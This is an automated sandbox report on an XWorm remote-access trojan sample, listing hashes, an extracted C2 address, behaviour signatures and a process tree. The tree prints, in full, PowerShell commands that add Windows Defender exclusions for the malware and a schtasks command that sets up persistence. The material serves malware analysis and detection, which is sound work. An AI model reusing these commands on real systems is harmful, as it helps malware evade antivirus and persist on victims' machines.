Analysis
- max time kernel: 30s
- max time network: 32s
- platform: windows11-21h2_x64
- resource: win11-20240419-en
- resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 11-05-2024 09:52
Behavioral tasks (sample on resource)
- behavioral1: fr2nnk.exe on win10-20240404-en
- behavioral2: fr2nnk.exe on win7-20240221-en
- behavioral3: fr2nnk.exe on win10v2004-20240226-en
- behavioral4: fr2nnk.exe on win11-20240426-en
- behavioral5: grab.exe on win10-20240404-en
- behavioral6: grab.exe on win7-20240221-en
- behavioral7: grab.exe on win10v2004-20240426-en
- behavioral8: grab.exe on win11-20240508-en
- behavioral9: m2zen.exe on win10-20240404-en
- behavioral10: m2zen.exe on win7-20231129-en
- behavioral11: m2zen.exe on win10v2004-20240508-en
- behavioral12: m2zen.exe on win11-20240508-en
- behavioral13: winhlp32.exe on win10-20240404-en
- behavioral14: winhlp32.exe on win7-20240419-en
- behavioral15: winhlp32.exe on win10v2004-20240508-en
- behavioral16: winhlp32.exe on win11-20240419-en
General
- Target: winhlp32.exe
- Size: 205KB
- MD5: a83dc22ef14c6b5d96aaee00b10a4973
- SHA1: ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
- SHA256: 143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
- SHA512: 0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
- SSDEEP: 6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted:
- Family: xworm
- Version: 3.0
- C2: 147.185.221.18:41012
- Install_directory: %AppData%
- install_file: Agent.exe
Signatures

Detect Xworm Payload (2 IoCs)
Processes (resource, yara_rule):
- C:\Windows\System32\x4L.exe, family_xworm
- behavioral16/memory/2796-18-0x0000000000190000-0x00000000001A8000-memory.dmp, family_xworm
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes (description, pid, process, target process):
- PID 3608 created 636, 3608, powershell.EXE, winlogon.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes (pid, process):
- 4844, powershell.exe
- 1760, powershell.exe
- 3440, powershell.exe
Drops startup file (2 IoCs)
Processes (description, ioc, process):
- File created, C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk, x4L.exe
- File opened for modification, C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk, x4L.exe
Executes dropped EXE (2 IoCs)
Processes (pid, process):
- 2796, x4L.exe
- 2292, x4Shellcode.exe
Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description, ioc, process):
- Set value (str), \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4L = "C:\\Users\\Admin\\AppData\\Roaming\\x4L.exe", x4L.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
- 1, ip-api.com
Drops file in System32 directory (9 IoCs)
Processes (description, ioc, process):
- File opened for modification, C:\Windows\System32\x4L.exe, winhlp32.exe
- File created, C:\Windows\System32\x4Shellcode.exe, winhlp32.exe
- File opened for modification, C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log, powershell.EXE
- File opened for modification, C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx, svchost.exe
- File opened for modification, C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx, svchost.exe
- File created, C:\Windows\System32\x4L.exe, winhlp32.exe
- File opened for modification, C:\Windows\System32\x4Shellcode.exe, winhlp32.exe
- File opened for modification, C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, powershell.EXE
- File opened for modification, C:\Windows\System32\Tasks\x4L, svchost.exe
Suspicious use of SetThreadContext (1 IoC)
Processes (description, pid, process, target process):
- PID 3608 set thread context of 3692, 3608, powershell.EXE, dllhost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Delays execution with timeout.exe (1 IoC)
Processes (pid, process):
- 1572, timeout.exe
Modifies data under HKEY_USERS (41 IoCs)
Processes: powershell.EXE [41 "Key created" registry entries omitted]
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.EXE, dllhost.exe, powershell.exe, powershell.exe, powershell.exe [64 pid entries omitted]
Suspicious use of AdjustPrivilegeToken (18 IoCs)
Processes (description, pid, process):
- Token: SeDebugPrivilege, 4472, winhlp32.exe
- Token: SeDebugPrivilege, 2796, x4L.exe
- Token: SeDebugPrivilege, 3608, powershell.EXE
- Token: SeDebugPrivilege, 3608, powershell.EXE
- Token: SeDebugPrivilege, 3692, dllhost.exe
- Token: SeDebugPrivilege, 4844, powershell.exe
- Token: SeShutdownPrivilege, 3300, Explorer.EXE
- Token: SeCreatePagefilePrivilege, 3300, Explorer.EXE
- Token: SeDebugPrivilege, 1760, powershell.exe
- Token: SeShutdownPrivilege, 3300, Explorer.EXE
- Token: SeCreatePagefilePrivilege, 3300, Explorer.EXE
- Token: SeDebugPrivilege, 3440, powershell.exe
- Token: SeShutdownPrivilege, 3300, Explorer.EXE
- Token: SeCreatePagefilePrivilege, 3300, Explorer.EXE
- Token: SeShutdownPrivilege, 3300, Explorer.EXE
- Token: SeCreatePagefilePrivilege, 3300, Explorer.EXE
- Token: SeAuditPrivilege, 2576, svchost.exe
- Token: SeDebugPrivilege, 2796, x4L.exe
Suspicious use of SetWindowsHookEx (1 IoC)
Processes (pid, process):
- 2796, x4L.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: winhlp32.exe, cmd.exe, powershell.EXE, dllhost.exe [64 "wrote to memory of" entries omitted]
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (image path | command line; nesting shows parent/child, with the signatures each process triggered listed beneath it)
- [1] C:\Windows\system32\winlogon.exe | winlogon.exe
  - [2] C:\Windows\system32\dwm.exe | "dwm.exe"
  - [2] C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{39fab51a-a884-4cdb-bc30-892abd37798d}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
- [1] C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | [long obfuscated inline PowerShell command line omitted]
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - [2] C:\Windows\system32\sihost.exe | sihost.exe
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- [1] C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\sysmon.exe | C:\Windows\sysmon.exe
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- [1] C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding
- [1] C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
  - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | "C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\x4L.exe | "C:\Windows\System32\x4L.exe"
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - [5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - [5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - [5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - [4] C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"
        - Creates scheduled task(s)
        - [5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - [3] C:\Windows\System32\x4Shellcode.exe | "C:\Windows\System32\x4Shellcode.exe"
      - Executes dropped EXE
    - [3] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DC0.tmp.bat""
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - [4] C:\Windows\system32\timeout.exe | timeout 3
        - Delays execution with timeout.exe
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
- [1] C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
- [1] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- [1] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- [1] C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding
- [1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- [1] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- [1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
- [1] C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- [1] C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5:    627073ee3ca9676911bee35548eff2b8
    SHA1:   4c4b68c65e2cab9864b51167d710aa29ebdcff2e
    SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
    SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5:    2e8eb51096d6f6781456fef7df731d97
    SHA1:   ec2aaf851a618fb43c3d040a13a71997c25bda43
    SHA256: 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
    SHA512: 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5:    d9ab3936ebf6fed38eaf459295749389
    SHA1:   158fa8f3970ceb35bcb9c5417e843ac6fe3ae706
    SHA256: 4468439a325c4ef8c3aa846cc8cd401b36be35810068175369fe8f9cb1a9ca86
    SHA512: 4bd2b0a6cb0a95ecd94985669d31bcebedaf294bcc2f1959190e46019a0625306e81de74e0cb8b32cb9a3ef75560cdef3051c0b9f1ff4e314e98d2f11378da1b

C:\Users\Admin\AppData\Local\Temp\tmp5DC0.tmp.bat
    Filesize: 160B
    MD5:    54a5b6dd7cd8041b45c013e12e6045eb
    SHA1:   0edb16a81447e4a79df066de38d26cd3051fac7b
    SHA256: 08672d331bd761e3b97c2b8e01f99991f17b7d1aa15de7ad32c2d5cd9e62a669
    SHA512: b2fbc3d882bc73f0d4368a52c48c600c2bd2b368f9481e78c4735c9ee8be5bfa6fbd7e434815e9265ddbdcd62f2429b0ae1d984b47b91c3e246832be980dac2e

C:\Windows\System32\x4L.exe
    Filesize: 68KB
    MD5:    9ecdf1a7818f7e9952b6041e3aa19b7a
    SHA1:   93a8357036356c1c1e20a5cf69fdbad877ce8a0f
    SHA256: 0771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
    SHA512: 847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853

C:\Windows\System32\x4Shellcode.exe
    Filesize: 164KB
    MD5:    8a7bee2c8cec6ac50bc42fe03d3231e6
    SHA1:   ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
    SHA256: c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
    SHA512: 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

C:\Windows\Temp\__PSScriptPolicyTest_xnuc24ja.ozb.ps1
    Filesize: 60B
    MD5:    d17fe0a3f47be24a6453e9ef58c94641
    SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
memory/432-98-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
    Filesize: 64KB

memory/432-97-0x00000255A2510000-0x00000255A253C000-memory.dmp
    Filesize: 176KB

memory/432-91-0x00000255A2510000-0x00000255A253C000-memory.dmp
    Filesize: 176KB

memory/536-102-0x0000022A47330000-0x0000022A4735C000-memory.dmp
    Filesize: 176KB

memory/636-64-0x000001AE3B8E0000-0x000001AE3B90C000-memory.dmp
    Filesize: 176KB

memory/636-65-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
    Filesize: 64KB

memory/636-58-0x000001AE3B8E0000-0x000001AE3B90C000-memory.dmp
    Filesize: 176KB

memory/636-56-0x000001AE3B8B0000-0x000001AE3B8D6000-memory.dmp
    Filesize: 152KB

memory/636-57-0x000001AE3B8E0000-0x000001AE3B90C000-memory.dmp
    Filesize: 176KB

memory/688-75-0x000002C58E8E0000-0x000002C58E90C000-memory.dmp
    Filesize: 176KB

memory/688-76-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
    Filesize: 64KB

memory/688-69-0x000002C58E8E0000-0x000002C58E90C000-memory.dmp
    Filesize: 176KB

memory/1000-87-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmp
    Filesize: 64KB

memory/1000-86-0x0000023D334E0000-0x0000023D3350C000-memory.dmp
    Filesize: 176KB

memory/1000-80-0x0000023D334E0000-0x0000023D3350C000-memory.dmp
    Filesize: 176KB

memory/2796-18-0x0000000000190000-0x00000000001A8000-memory.dmp
    Filesize: 96KB

memory/2796-904-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmp
    Filesize: 10.8MB

memory/2796-903-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmp
    Filesize: 10.8MB

memory/2796-17-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmp
    Filesize: 10.8MB

memory/3608-35-0x00000215AF360000-0x00000215AF382000-memory.dmp
    Filesize: 136KB

memory/3608-49-0x00000215AF390000-0x00000215AF4DF000-memory.dmp
    Filesize: 1.3MB

memory/3608-39-0x00000215AF840000-0x00000215AF86A000-memory.dmp
    Filesize: 168KB

memory/3608-41-0x00007FFA9CFB0000-0x00007FFA9D06D000-memory.dmp
    Filesize: 756KB

memory/3608-40-0x00007FFA9E920000-0x00007FFA9EB29000-memory.dmp
    Filesize: 2.0MB

memory/3692-45-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/3692-42-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/3692-43-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/3692-44-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/3692-53-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/3692-50-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/3692-51-0x00007FFA9E920000-0x00007FFA9EB29000-memory.dmp
    Filesize: 2.0MB

memory/3692-52-0x00007FFA9CFB0000-0x00007FFA9D06D000-memory.dmp
    Filesize: 756KB

memory/4472-0-0x00007FFA7D983000-0x00007FFA7D985000-memory.dmp
    Filesize: 8KB

memory/4472-28-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmp
    Filesize: 10.8MB

memory/4472-2-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmp
    Filesize: 10.8MB

memory/4472-1-0x0000000000140000-0x000000000017A000-memory.dmp
    Filesize: 232KB